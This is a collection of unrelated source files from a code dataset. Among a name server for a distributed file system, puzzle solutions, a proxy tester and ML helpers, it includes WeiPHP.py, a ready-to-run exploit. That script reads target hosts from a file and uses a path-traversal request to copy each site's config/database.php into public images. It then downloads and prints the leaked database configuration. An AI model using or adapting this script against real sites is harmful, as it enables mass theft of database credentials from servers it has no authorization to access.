        self.fileTree.getFolderByPath(fileInfo.filePath).addFile(fileInfo)
        # add file to fileDict
        self.fileDict[fileInfo.fileLocation()] = fileInfo
        for server in servers:
            # add file to servers dict-s
            self.addFileToServer(server, fileInfo)
            StorageServerMessageSockets[server].send(b"write" + B_DELIMITER + fileInfo.encode())
        clientSocket.send(DELIMITER.join(servers).encode())

    def delFile(self, fileInfo: FileInfo):
        """
        Send file deletion request to StorageServers
        Purge info about that file from demon
        """
        # If the file does not exist => do nothing
        if not self.isFileExists(fileInfo):
            return
        trueFileInfo = self.fileDict[fileInfo.fileLocation()]
        self.fileTree.getFolderByPath(trueFileInfo.filePath).removeFile(trueFileInfo)
        for server in trueFileInfo.storageServers:
            self.delFileFromServer(server, trueFileInfo)
            print(f"Send delete request to storage server with IP:{server}")
            StorageServerMessageSockets[server].send(b"del" + B_DELIMITER + fileInfo.encode())
        del self.fileDict[trueFileInfo.fileLocation()]

    def infoFile(self, fileInfo: FileInfo, clientSocket: socket.socket):
        """
        Find file and send information about it to client
        """
        # In case such file does not exist, send "File not found"
        if not self.isFileExists(fileInfo):
            clientSocket.send(b"File not found")
            return
        # Find file in demon storage
        trueFileInfo = self.fileDict[fileInfo.fileLocation()]
        # Send info about file
        clientSocket.send(trueFileInfo.__str__().encode())

    def copyFile(self, fileInfo: FileInfo, newFileInfo: FileInfo, clientSocket: socket.socket):
        """
        Send copy request to StorageServers with original file
        Add info about new copy to demon
        """
        # If the source file does not exist, notify the client about it
        if not self.isFileExists(fileInfo):
            clientSocket.send(B_ERR_MSG)
            return
        clientSocket.send(B_CONFIRM_MSG)
        # choose servers that hold the source file
        servers = self.fileDict[fileInfo.fileLocation()].storageServers
        newFileInfo.addContainers(servers)
        # the copy inherits the true (current) size of the source
        newFileInfo.fileSize = self.fileDict[fileInfo.fileLocation()].fileSize
        self.fileTree.getFolderByPath(newFileInfo.filePath).addFile(newFileInfo)
        self.fileDict[newFileInfo.fileLocation()] = newFileInfo
        for server in servers:
            self.addFileToServer(server, newFileInfo)
            print(f"Send COPY request to storage server with IP:{server}")
            StorageServerMessageSockets[server].send(b"copy" + B_DELIMITER + fileInfo.encode() +
                                                     B_DELIMITER + newFileInfo.encode())

    def moveFile(self, fileInfo: FileInfo, newFileInfo: FileInfo, clientSocket: socket.socket):
        """
        Call copy and delete method
        (@see copyFile and delFile)
        """
        self.copyFile(fileInfo, newFileInfo, clientSocket)
        self.delFile(fileInfo)

    def openDirectory(self, path: str, clientSocket: socket.socket):
        """
        Check whether directory exists.
        If directory exists, send B_CONFIRM_MSG to client.
        Send B_ERR_MSG otherwise.
        """
        try:
            self.fileTree.getFolderByPath(path)
            clientSocket.send(B_CONFIRM_MSG)
        except Exception:
            clientSocket.send(B_ERR_MSG)

    def readDirectory(self, path, clientSocket: socket.socket):
        """
        Send information about files and directories in described folder to client.
        If the folder does not exist, send B_ERR_MSG to client.
        """
        try:
            clientSocket.send(self.fileTree.getFolderByPath(path).__str__().encode())
        except Exception:
            clientSocket.send(B_ERR_MSG)

    def makeDirectory(self, path: str, dirName: str, clientSocket: socket.socket):
        """
        Make directory in demon.
        If path is not correct, send B_ERR_MSG to client. (B_CONFIRM_MSG if it exists)
        """
        try:
            headDir = self.fileTree.getFolderByPath(path)
            if dirName not in [fld.name for fld in headDir.folders]:
                headDir.addFolder(FolderNode(dirName, headDir))
            # Existing directory counts as success too.
            clientSocket.send(B_CONFIRM_MSG)
        except Exception:
            clientSocket.send(B_ERR_MSG)  # Source path does not exist

    def delDirectory(self, path):
        """
        Delete directory from demon.
        Send delete directory request to storage servers.
        """
        directory = self.fileTree.getFolderByPath(path)
        headDirectory = directory.head
        self.recursiveDelete(directory)
        headDirectory.removeFolder(directory)
        for serverSocket in StorageServerMessageSockets.values():
            serverSocket.send(b"deldir" + B_DELIMITER + path.encode())

    def recursiveDelete(self, folder: FolderNode):
        """
        Delete inner files and folders of the specified folder via recursion.

        BUGFIX: iterate over *copies* of the child lists -- the original
        removed elements from the very list it was iterating, which skips
        every other entry and leaves children behind.
        """
        for subFolder in list(folder.folders):
            self.recursiveDelete(subFolder)
            folder.removeFolder(subFolder)
        for file in list(folder.files):
            for storageServer in file.storageServers:
                self.delFileFromServer(storageServer, file)
            del self.fileDict[file.fileLocation()]
        folder.removeAllFiles()

    def checkAndDelDirectory(self, path, clientSocket: socket.socket):
        """
        If target folder is empty, delete it.
        If target folder is not empty, ask the user for confirmation and delete it if the user agrees.
        If target folder does not exist, send B_ERR_MSG to client.
        """
        try:
            if self.fileTree.getFolderByPath(path).isEmpty():
                clientSocket.send(b"folderEmpty")
                self.delDirectory(path)
            else:
                clientSocket.send(b"folderNotEmpty")
                while True:
                    response = clientSocket.recv(BUFFER)
                    if response != b"":
                        response = response.decode()
                        if response == "acceptDel":
                            self.delDirectory(path)
                            break
                        elif response == "denyDel":
                            break
                        else:
                            print(f"Unknown response: {response}")
                            break
        except Exception:
            clientSocket.send(B_ERR_MSG)

    def handleServerClose(self, serverIP: str):
        """
        Re-replicate every file that was on the disconnected server to a
        server that does not yet hold it.
        """
        # Get information about all files that were on that server
        files = self.serversFiles[serverIP]
        print(f"ServerIP of disconnected server: {serverIP}")
        for file in files:
            print(f"FileInfo: {file}")
            # Find available servers to save information
            availableStorageServers = [*StorageServers]
            print(f"Available SS: {availableStorageServers}")
            for SS in file.storageServers:
                availableStorageServers.remove(SS)
            print(f"Available SS: {availableStorageServers}")
            # Delete information about the dead storage server from fileInfo
            file.deleteContainer(serverIP)
            # Pick a server holding the file and a server able to receive a
            # new replica (random.choice over a tuple: sampling from a set
            # was removed in Python 3.11).
            serverSender: str = random.choice(tuple(file.storageServers))
            serverReceiver: str = random.choice(availableStorageServers)
            serverSenderSocket: socket.socket = StorageServerMessageSockets[serverSender]
            serverReceiverSocket: socket.socket = StorageServerMessageSockets[serverReceiver]
            print(f"Replicate from server {serverSender} to server {serverReceiver} of file {file}")
            # Send information about the file and the opposite endpoint to both servers
            serverSenderSocket.send(b"serverSend" + B_DELIMITER + serverReceiver.encode() + B_DELIMITER + file.encode())
            serverReceiverSocket.send(b"serverReceive" + B_DELIMITER + serverSender.encode()
                                      + B_DELIMITER + file.encode())
            self.addFileToServer(serverReceiver, file)
            file.addContainer(serverReceiver)
            # Throttle successive replication requests.
            sleep(0.1488)
        # Delete the dead server from the demon's server list
        del self.serversFiles[serverIP]
class IPPropagator(Thread):
    """Daemon thread answering UDP discovery probes with a greeting, so new
    entities can learn the name server's address."""

    def __init__(self, sock: socket.socket):
        super().__init__(daemon=True)
        self.sock = sock

    def run(self):
        # Reply to every incoming datagram forever.
        while True:
            _, sender = self.sock.recvfrom(BUFFER)
            print("New entity trying to find name server.")
            self.sock.sendto(b'Hello, new server', sender)
class HeartListener(Thread):
    """Daemon thread consuming heartbeat packets from one storage server and
    triggering cleanup/re-replication once the server goes silent."""
    def __init__(self, name: str, sock: socket.socket, ip: str, storageDemon: StorageDemon):
        super().__init__(daemon=True)
        self.name = name            # human-readable server name (e.g. "SS_1")
        self.sock = sock            # heartbeat TCP connection
        self.ip = ip                # server IP, key into the global registries
        self.demon = storageDemon
    def close(self):
        # Re-replicate the dead server's files first, then forget the server.
        print(f"Storage server {self.name}(IP:{self.ip}) disconnected.")
        self.demon.handleServerClose(self.ip)
        del StorageServers[self.ip]
        del StorageServerMessageSockets[self.ip]
        self.sock.close()
    def run(self):
        try:
            # Receive heartbeat
            # recv() returns b'' (falsy) once the peer closes, ending the loop.
            while self.sock.recv(BUFFER):
                sleep(3)
        except:
            # Socket errors are treated the same as a clean disconnect.
            pass
        finally:
            self.close()
class SSHeartbeatInitializer(Thread):
    """Daemon thread accepting heartbeat connections from new storage servers,
    registering them and spawning one HeartListener per server."""
    def __init__(self, sock: socket.socket, storageDemon: StorageDemon):
        super().__init__(daemon=True)
        self.sock = sock            # listening TCP welcome socket
        self.demon = storageDemon
    def run(self):
        serverID = 1  # sequential id, only used to build readable names
        while True:
            con, addr = self.sock.accept()
            serverIP = addr[0]
            SSName = f"SS_{serverID}"
            StorageServers[serverIP] = SSName  # global registry {IP: name}
            print(f"Storage server {SSName}(IP:{serverIP}) connected.")
            serverID += 1
            HeartListener(SSName, con, serverIP, self.demon).start()
class ClientMessenger(Thread):
    """Per-client worker thread: receives requests of the form
    ``<req>DELIMITER<arg>...``, parses them, and dispatches to the
    StorageDemon until the client disconnects."""

    def __init__(self, name: str, sock: socket.socket, ip: str, demon: StorageDemon):
        super().__init__()
        self.name = name    # human-readable client name (e.g. "CLIENT_1")
        self.sock = sock    # per-client TCP connection
        self.ip = ip        # client IP, tracked in the global ClientIPs list
        self.demon = demon

    def close(self):
        """Deregister the client and release its socket."""
        ClientIPs.remove(self.ip)
        print(f"Client {self.name}(IP:{self.ip}) disconnected.")
        self.sock.close()

    def run(self):
        try:
            while True:
                msg = self.sock.recv(BUFFER)
                if msg == b'':
                    # BUGFIX: recv() returning b'' means the peer closed the
                    # connection. The original slept and retried forever, so
                    # close() was never reached for disconnected clients.
                    break
                data = msg.decode().split(DELIMITER)
                print(f"Get request information {data} from client: {self.name}")
                req, meta = data[0], data[1:]
                if req == "write":
                    # meta: fileName, fileSize, filePath
                    fileInfo = FileInfo(meta[0], meta[2], int(meta[1]))
                    self.demon.writeFile(fileInfo, self.sock)
                elif req == "init":
                    self.demon.initialize(self.sock)
                elif req == "del":
                    self.demon.delFile(FileInfo(meta[0], meta[1], 0))
                elif req == "create":
                    self.demon.createFile(FileInfo(meta[0], meta[1], 0))
                elif req == "read":
                    self.demon.readFile(FileInfo(meta[0], meta[1], 0), self.sock)
                elif req == "info":
                    self.demon.infoFile(FileInfo(meta[0], meta[1], 0), self.sock)
                elif req == "copy":
                    # meta: fileName, filePath, newFileName, newFilePath
                    fileInfo = FileInfo(meta[0], meta[1], 0)
                    newFileInfo = FileInfo(meta[2], meta[3], 0)
                    self.demon.copyFile(fileInfo, newFileInfo, self.sock)
                elif req == "move":
                    fileInfo = FileInfo(meta[0], meta[1], 0)
                    newFileInfo = FileInfo(meta[2], meta[3], 0)
                    self.demon.moveFile(fileInfo, newFileInfo, self.sock)
                elif req == "ls":
                    self.demon.readDirectory(meta[0], self.sock)
                elif req == "mkdir":
                    # meta: dirName, path
                    self.demon.makeDirectory(meta[1], meta[0], self.sock)
                elif req == "del_dir":
                    self.demon.checkAndDelDirectory(path=meta[0], clientSocket=self.sock)
                elif req == "cd":
                    self.demon.openDirectory(meta[0], self.sock)
                else:
                    print(f"Unknown request: {req}")
        except Exception:
            # Any parse/socket error terminates this client session.
            pass
        finally:
            self.close()
class ClientWelcome(Thread):
    """Daemon thread accepting client connections and spawning one
    ClientMessenger per client."""

    def __init__(self, sock: socket.socket, demon: StorageDemon):
        super().__init__(daemon=True)
        self.sock = sock
        self.demon = demon

    def run(self):
        nextClientId = 1
        while True:
            connection, address = self.sock.accept()
            ip = address[0]
            ClientIPs.append(ip)
            name = f"CLIENT_{nextClientId}"
            nextClientId += 1
            print(f"Client {name}(IP:{ip}) connected.")
            ClientMessenger(name, connection, ip, self.demon).start()
class ServerWelcome(Thread):
    """Daemon thread accepting the messaging connection from storage servers
    that already registered via the heartbeat channel."""
    def __init__(self, sock: socket.socket):
        super().__init__(daemon=True)
        self.sock = sock
    def run(self):
        while True:
            con, addr = self.sock.accept()
            serverIP = addr[0]
            # The server must have heartbeat-registered first, otherwise this
            # lookup raises KeyError.
            serverName = StorageServers[serverIP]
            StorageServerMessageSockets[serverIP] = con  # global {IP: socket}
            print(f"Storage server {serverName}(IP:{serverIP}) establish messaging connection.")
def main():
    """Bootstrap the name server: UDP discovery, storage-server heartbeat and
    messaging sockets, client welcome socket -- then park the main thread."""
    # UDP socket to meet new connections and provide them IP
    IPPropagationSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    IPPropagationSocket.bind(("", SERVER_WELCOME_PORT))
    IPPropagator(IPPropagationSocket).start()
    # Initialize storage demon
    demon = StorageDemon()
    # TCP welcome socket for initializing Storage Servers heartbeats
    storageServerHeartbeatInitializer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    storageServerHeartbeatInitializer.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    storageServerHeartbeatInitializer.bind(('', SERVER_HEARTBEAT_PORT))  # Bind to specified port
    storageServerHeartbeatInitializer.listen()  # Enable connections
    SSHeartbeatInitializer(storageServerHeartbeatInitializer, demon).start()
    # TCP welcome socket for message data about requests with Storage Servers
    storageServerWelcomeSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    storageServerWelcomeSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    storageServerWelcomeSocket.bind(('', SERVER_MESSAGE_PORT))
    storageServerWelcomeSocket.listen()
    ServerWelcome(storageServerWelcomeSocket).start()
    # TCP socket to initiate connections with Clients
    clientWelcomeSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    clientWelcomeSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    clientWelcomeSocket.bind(("", CLIENT_MESSAGE_PORT))
    clientWelcomeSocket.listen()
    ClientWelcome(clientWelcomeSocket, demon).start()
    # BUGFIX: `while True: pass` busy-spun a full CPU core. Sleeping keeps
    # the daemon threads alive without burning CPU.
    while True:
        sleep(60)
# Run the name server only when executed as a script.
if __name__ == "__main__":
    main()
| Leosimetti/DS-project-2-Distributed-file-system | Nameserver/NameServer.py | NameServer.py | py | 25,524 | python | en | code | 0 | github-code | 90 |
18055231409 | N, A, B = map(int, input().split())
S = input()
# Running totals: `all` counts every passing participant (quota A + B),
# `foreign` counts passing overseas ('b') participants (quota B).
# NOTE(review): `all` shadows the builtin -- kept unchanged here.
all = 0
foreign = 0
for i in range(len(S)):
    # 'a' (domestic): passes while the combined quota A + B is not exhausted
    if S[i] == 'a' and all < A + B:
        print('Yes')
        all += 1
        continue
    # 'b' (overseas): additionally limited to at most B overseas passers
    if S[i] == 'b' and all < A + B and foreign < B:
        print('Yes')
        all += 1
        foreign += 1
        continue
print('No') | Aasthaengg/IBMdataset | Python_codes/p03971/s991625010.py | s991625010.py | py | 293 | python | en | code | 0 | github-code | 90 |
19597451449 | import requests
import random
import re
def title():
    """Print the tool's ANSI-colored banner and usage hint."""
    print('+------------------------------------------')
    print('+ \033[31m公众号:深夜笔记本 \033[0m')
    print('+ \033[34mVersion: weiphp \033[0m')
    print('+ \033[36m使用格式: python3 poc.py \033[0m')
    print('+ \033[36mFile >>> ip.txt \033[0m')
    print('+------------------------------------------')
def POC_1(target_url):
    """Probe the WeiPHP `Material::_download_imgage` endpoint of *target_url*
    for the known path-traversal issue and report whether it responded 200.
    Intended for authorized security testing only."""
    upload_url = target_url + "/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
    }
    data = {
        "1":1
    }
    try:
        response = requests.post(url=upload_url, headers=headers, data=data, timeout=20)
        if response.status_code == 200:
            print("\033[32m[o] 成功将 database.php文件 写入Pictrue表中\033[0m")
        else:
            print("\033[31m[x] 漏洞利用失败 \033[0m")
    except:
        # Network errors are reported the same way as a failed probe.
        print("\033[31m[x] 漏洞利用失败 \033[0m")
def POC_2(target_url):
    """Fetch the target's `home/file/user_pics` listing, extract the image
    URLs from it and download each referenced file under a random local
    name. Intended for authorized security testing only."""
    vnln_url = target_url + "/public/index.php/home/file/user_pics"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
    }
    try:
        response = requests.get(url=vnln_url, headers=headers).text
        # Collect every <img src="..."> URL from the page.
        href = re.findall(r'<img src="(.*?)"', response)
        for i in href:
            print("\033[32m[o] 得到敏感文件url:{}\033[0m".format(i))
            data = requests.get(url=i, headers=headers)
            # Save under a random name to avoid collisions between downloads.
            path = str(random.randint(1,999)) + '.php'
            with open(path, 'wb') as f:
                f.write(data.content)
            print("\033[32m[o] 成功下载文件为:{}\033[0m".format(path))
            print("\033[32m[o] 文件内容为:\n\033[0m{}".format(data.text))
    except:
        print("\033[31m[x] 获取文件名失败 \033[0m")
def Scan(file_name):
    """Run POC_1/POC_2 against every host listed (one per line) in
    *file_name*, prefixing 'http://' when no scheme is given."""
    with open(file_name, "r", encoding='utf8') as scan_url:
        for url in scan_url:
            if url[:4] != "http":
                url = "http://" + url
            url = url.strip('\n')
            try:
                POC_1(url)
                POC_2(url)
            except Exception as e:
                # NOTE(review): the message uses .format(e) but has no
                # placeholder, so the exception text is silently dropped.
                print("\033[31m[x] 请求报错 \033[0m".format(e))
                continue
# Script entry: show the banner and ask for the target-list file.
if __name__ == '__main__':
    title()
    file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m"))
Scan(file_name) | wushigudan/poc | WeiPHP.py | WeiPHP.py | py | 2,845 | python | en | code | 14 | github-code | 90 |
73562705898 | from os import urandom
from struct import pack, unpack_from
from time import time
import socket
import hashlib
import mtproto
from ctr_socket import CTRSocket
from tls_socket import TLSSocket
def connect(dc_id, ip, port, secret, timeout):
    """Open one MTProto-proxy connection and time the key-fingerprint
    handshake. Returns ((elapsed_ms, fingerprint), None); socket and
    protocol errors propagate to the caller (see test_mtproxy)."""
    protocol = 0xefefefef  # default transport tag; NOTE(review): value is set but never sent here
    # Secrets longer than 32 hex chars carry a one-byte mode prefix.
    obfs = len(secret) > 32
    proxy_real_secret = bytearray.fromhex(secret if not obfs else secret[2:34])
    # "ee" prefix: remainder of the secret encodes a domain -- presumably the
    # fake-TLS SNI; TODO confirm against TLSSocket.
    proxy_domain = bytearray.fromhex(secret[34:]) if obfs and secret[:2] == "ee" else None
    # "dd" prefix (exactly 34 hex chars): padded transport mode.
    proxy_padded = len(secret) == 34 and secret[:2] == "dd"
    ws = None
    if proxy_padded:
        protocol = 0xdddddddd
    if proxy_domain:
        ws = TLSSocket(proxy_domain, proxy_real_secret)
    s = CTRSocket(sock=ws, timeout=timeout)
    s.connect((ip, port))
    # now we established a connection...
    start = time()
    session = mtproto.Session(s, using_proxy=True, padded=proxy_padded)
    res = session.get_server_public_key_fingerprint()
    end = time()
    return ((end - start) * 1000, res), None
def test_mtproxy(dc_id, ip, port, secret, timeout=5.0):
    """Attempt the proxy handshake, retrying up to three additional times.

    Returns ``(result, None)`` on success, or ``(None, last_exception)``
    after all four attempts have failed.
    """
    attempts_left = 3
    while True:
        try:
            return connect(dc_id, ip, port, secret, timeout)
        except Exception as err:
            if attempts_left == 0:
                return None, err
            attempts_left -= 1
def test_direct(ip='149.154.167.40', port=443, padded=False, intermediate=False):
    """Time a direct (proxyless) MTProto handshake against a Telegram DC.
    Returns ((elapsed_ms, fingerprint), None) on success or
    (None, exception) on any failure."""
    try:
        s = socket.socket()
        s.connect((ip, port))
        session = mtproto.Session(s, padded=padded, intermediate=intermediate)
        start = time()
        res = session.get_server_public_key_fingerprint()
        end = time()
        return ((end - start) * 1000, res), None
    except Exception as e:
        return None, e
| chinuts/tg-mtproxy-test | main.py | main.py | py | 1,712 | python | en | code | 1 | github-code | 90 |
19568964272 | import numpy
def Optimal_BST(p, q, n):
    """Optimal binary search tree via dynamic programming (CLRS 15.5).

    p -- key probabilities, 1-indexed (p[0] unused), for keys k1..kn
    q -- dummy-key probabilities q[0..n]
    n -- number of real keys

    Returns (e, root, w):
      e[i][j]    -- expected search cost of the optimal BST over keys ki..kj
      w[i][j]    -- probability mass of keys ki..kj plus adjacent dummies
      root[i][j] -- index of the root key of that optimal subtree
    Costs are rounded to 2 decimals at each step, as in the original.
    """
    e = numpy.zeros((n + 2, n + 1))     # e[1..n+1][0..n]
    w = numpy.zeros((n + 2, n + 1))     # w[1..n+1][0..n]
    root = numpy.zeros((n + 1, n + 1))  # root[1..n][1..n]
    # Base case: an empty key range consists of a single dummy key.
    for i in range(1, n + 2):
        e[i][i - 1] = q[i - 1]
        w[i][i - 1] = q[i - 1]
    # l is the length of the key range currently being solved.
    for l in range(1, n + 1):
        for i in range(1, n - l + 2):
            j = i + l - 1
            e[i][j] = float('inf')  # proper sentinel instead of the magic 10000000
            w[i][j] = round(w[i][j - 1] + p[j] + q[j], 2)
            # Try every key r in ki..kj as the root of the subtree.
            for r in range(i, j + 1):
                t = e[i][r - 1] + e[r + 1][j] + w[i][j]
                if t < e[i][j]:
                    e[i][j] = round(t, 2)
                    root[i][j] = r
    return e, root, w
try:
    # Sample data from CLRS Figure 15.5: 5 keys with probabilities p[1..5]
    # and dummy-key probabilities q[0..5].
    p=[0,0.15,0.1,0.05,0.1,0.2]
    q=[0.05,0.1,0.05,0.05,0.05,0.1]
    n=5
    e,root,w=Optimal_BST(p,q,n)
    print('\n')
    print("e table:")
    for i in range(n+2):
        print(e[i])
    print('\n')
    print("w table:")
    for i in range(n+2):
        print(w[i])
    print('\n')
    print("root table:")
    for i in range(1,n+1):
        print(root[i])
# NOTE(review): the exception name `e` shadows the cost table above.
except Exception as e:
print(str(e)) | leo735262/Python | ALG/Optimal_BST.py | Optimal_BST.py | py | 1,143 | python | en | code | 0 | github-code | 90 |
27328462875 | #!/usr/bin/env python
import bernhard
import os, time
from datetime import datetime
from sys import argv
from socket import gethostname
# Report the age of the last local backup to a Riemann monitoring server.
HOST = gethostname()
SERVER = argv[1]  # Riemann host, taken from the first CLI argument
STATEFILE = '/var/backups/local.backup.timestamp'
c = bernhard.Client(SERVER)
event = {}
event['host'] = HOST
event['service'] = 'last successful backup time'
event['ttl'] = 7200
event['tags'] = ['backups']
if os.path.exists(STATEFILE):
    # The statefile's mtime marks the moment of the last successful backup.
    lastbackup = os.stat(STATEFILE).st_mtime
    timediff = time.time() - lastbackup
    if timediff < 0:
        event['state'] = 'critical'
        description = 'in the future, this is wrong!'
    elif 90000 < timediff < 180000: # 1d+1h, resp. 2d+2h
        # NOTE(review): ages between 24h and 25h still report 'ok' -- the
        # thresholds appear to include a deliberate 1-hour grace period.
        event['state'] = 'warning'
        description = 'older than 1 day'
    elif timediff > 180000:
        event['state'] = 'critical'
        description = 'older than 2 days'
    else:
        event['state'] = 'ok'
        description = 'within last 24h'
    # BUGFIX: the format string used %m (month) where minutes (%M) were
    # clearly intended, producing timestamps like "2024-01-02 13:01:05"
    # with the month in the minutes position.
    event['description'] = "%s: %s" % (description, datetime.utcfromtimestamp(lastbackup).strftime("%Y-%m-%d %H:%M:%S"))
else:
    event['description'] = 'no statefile found'
    event['state'] = 'critical'
c.send(event)
| c2corg/infrastructure | puppetmaster/site-modules/c2cinfra/files/backup/last_backup.py | last_backup.py | py | 1,110 | python | en | code | 2 | github-code | 90 |
def fact(n):
    """Return n! for a non-negative integer n.

    BUGFIX: the original printed an error message for negative input (and
    printed "1" for n == 0) yet silently fell through and returned 1 in
    both cases; negative input now raises ValueError instead.
    """
    if n < 0:
        raise ValueError("Can't find factorial of a negative number")
    result = 1
    for i in range(2, n + 1):
        result *= i
    return result
# a =fact(99999)
# print(a)
| yashu762001/Python-Tutorial | General/Factorial.py | Factorial.py | py | 254 | python | en | code | 1 | github-code | 90 |
18011677619 | from collections import defaultdict
def input_as_int():
    """Read one whitespace-separated stdin line as a list of ints."""
    return list(map(int,input().split()))
def get_comb(n):  # table of C(i, j) up to n C n
    """Return an (n+1) x (n+1) table t with t[i][j] = C(i, j) for j <= i.

    Cells with j > i keep the sentinel string "error", exactly like the
    original implementation.
    """
    fac = get_fact(n)
    table = [["error"] * (n + 1) for _ in range(n + 1)]
    for i in range(n + 1):
        for j in range(i + 1):
            # j <= i always holds inside this loop, so no extra guard needed.
            table[i][j] = fac[i] // (fac[i - j] * fac[j])
    return table
def get_fact(n):
    """Return the list [0!, 1!, ..., n!] (length n + 1)."""
    factorials = [1]
    running = 1
    for k in range(1, n + 1):
        running *= k
        factorials.append(running)
    return factorials
N,A,B = input_as_int()
Vs = input_as_int()
Vs.sort(reverse= True)
nums = defaultdict(lambda :0)   # value -> multiplicity in the whole input
kose = defaultdict(lambda :0)   # value -> count of it in the chosen prefix
com = get_comb(N)
for v in Vs:
    nums[v] += 1
total = 0
# The maximum average is attained by the A largest values.
for i in range(A):
    total += Vs[i]
    kose[Vs[i]] += 1
av = total / A
i = A
ans = 0
# Count the selections achieving that average: the product of ways to pick
# each distinct value; while every chosen value equals the maximum Vs[0],
# larger selection sizes (up to B) also attain the same average.
while True:
    temp = 1
    for k,v in kose.items():
        n = nums[k]
        temp *= com[n][v]
    ans += temp
    if i ==B or Vs[i] != Vs[0] :
        break
    else:
        kose[Vs[i]] +=1
        i += 1
print(av)
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p03776/s020738595.py | s020738595.py | py | 1,016 | python | en | code | 0 | github-code | 90 |
73632996138 | from LinkedList import LinkedList
def del_mid_node(n):
    """Delete node *n* from a singly linked list given access to *n* only
    (CtCI 2.3): copy the successor's value into *n*, then unlink the
    successor. Cannot delete the tail node.

    BUGFIX: the original unlinked first (``n.next = n.next.next``) and then
    read ``n.next.next.value``, copying a value from two nodes ahead and
    corrupting the list.
    """
    n.value = n.next.value
    n.next = n.next.next
# Demo: build the list 1..9 keeping a handle on the middle node (5),
# then delete that node in place and print the list before and after.
ll = LinkedList()
ll.add_multiple([1, 2, 3, 4])
middle_node = ll.add(5)
ll.add_multiple([7, 8, 9])
print(ll)
del_mid_node(middle_node)
print(ll)
| tech-cow/big4 | algorithm_AKA_谷歌我来了/cc150/chapter2_linked_list/2_3_delete_mid_node.py | 2_3_delete_mid_node.py | py | 261 | python | en | code | 7 | github-code | 90 |
def main():
    """Shower problem: each press at time T[i] makes the shower run for t
    more seconds from that moment (overlapping runs merge). Print the total
    number of seconds the shower emits water."""
    import sys
    read_line = sys.stdin.readline
    n, t = map(int, read_line().split())
    presses = list(map(int, read_line().split()))
    # Each press except the last contributes min(gap to the next press, t);
    # the final press always contributes a full t.
    total = 0
    for idx in range(1, n):
        total += min(presses[idx] - presses[idx - 1], t)
    print(total + t)
# Script entry point.
if __name__ == '__main__':
    main()
| Aasthaengg/IBMdataset | Python_codes/p03733/s329315507.py | s329315507.py | py | 301 | python | en | code | 0 | github-code | 90 |
16989450562 | import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
from skimage import color
def load_demo_image():
    """Load the demo JPEG, convert RGB -> CIELAB, and return the lightness
    channel rescaled to [0, 1] (LAB's L lies in [0, 100])."""
    im = color.rgb2lab(Image.open('../object_recognition/img/Patern_test.jpg')) / 100.0
    return im[..., 0]
def zca_whitening(inputs):
    """ZCA-whiten *inputs* (rows = features, columns = samples).

    Returns (whitened_inputs, ZCAMatrix).

    BUGFIX: ``np.linalg.svd`` returns the singular values ``S`` as a 1-D
    vector, so the original ``np.diag(S)`` built a matrix whose zero
    off-diagonal entries became ``1/sqrt(epsilon)`` after the elementwise
    sqrt/reciprocal, producing a non-whitening transform. The vector is now
    used directly.
    """
    sigma = np.dot(inputs, inputs.T) / inputs.shape[1]  # Correlation matrix
    U, S, V = np.linalg.svd(sigma)  # Singular Value Decomposition
    epsilon = 0.1  # Whitening constant, it prevents division by zero
    ZCAMatrix = np.dot(np.dot(U, np.diag(1.0 / np.sqrt(S + epsilon))), U.T)  # ZCA Whitening matrix
    return np.dot(ZCAMatrix, inputs), ZCAMatrix  # Data whitening
def scale_to_unit_interval(ndar, eps=1e-8):
    """ Scales all values in the ndarray ndar to be between 0 and 1 """
    # Work on a float64 copy: the original copied but kept the input dtype,
    # so the in-place `*= 1.0/...` raised a TypeError for integer arrays.
    ndar = ndar.astype('float64')
    ndar -= ndar.min()
    # eps keeps the division finite when all values are equal (max == 0).
    ndar *= 1.0 / (ndar.max() + eps)
    return ndar
def tile_raster_images(X, img_shape, tile_shape, tile_spacing=(0, 0),
                       scale_rows_to_unit_interval=True,
                       output_pixel_vals=True):
    """
    Transform an array with one flattened image per row, into an array in
    which images are reshaped and layed out like tiles on a floor.
    This function is useful for visualizing datasets whose rows are images,
    and also columns of matrices for transforming those rows
    (such as the first layer of a neural net).
    :type X: a 2-D ndarray or a tuple of 4 channels, elements of which can
    be 2-D ndarrays or None;
    :param X: a 2-D array in which every row is a flattened image.
    :type img_shape: tuple; (height, width)
    :param img_shape: the original shape of each image
    :type tile_shape: tuple; (rows, cols)
    :param tile_shape: the number of images to tile (rows, cols)
    :param output_pixel_vals: if output should be pixel values (i.e. int8
    values) or floats
    :param scale_rows_to_unit_interval: if the values need to be scaled before
    being plotted to [0,1] or not
    :returns: array suitable for viewing as an image.
    (See:`Image.fromarray`.)
    :rtype: a 2-d array with same dtype as X.
    """
    # NOTE(review): scale_rows_to_unit_interval is accepted but never used
    # in this implementation.
    assert len(tile_shape) == 2
    assert len(tile_spacing) == 2
    # The expression below can be re-written in a more C style as
    # follows :
    #
    # out_shape = [0,0]
    # out_shape[0] = (img_shape[0]+tile_spacing[0])*tile_shape[0] -
    #                tile_spacing[0]
    # out_shape[1] = (img_shape[1]+tile_spacing[1])*tile_shape[1] -
    #                tile_spacing[1]
    out_shape = [
        (ishp + tsp) * tshp - tsp
        for ishp, tshp, tsp in zip(X[0].shape[:2], tile_shape, tile_spacing)
    ]
    # Keep a trailing channel axis when the tiles are multi-channel.
    if len(X[0].shape)>2:
        out_shape.append(X[0].shape[2])
    # NOTE(review): `if True:` is a leftover guard from a removed multi-channel
    # branch; the body always runs.
    if True:
        # if we are dealing with only one channel
        H, W = X[0].shape[:2]
        Hs, Ws = tile_spacing
        # generate a matrix to store the output
        dt = X.dtype
        if output_pixel_vals:
            dt = 'uint8'
        out_array = np.zeros(out_shape, dtype=dt)
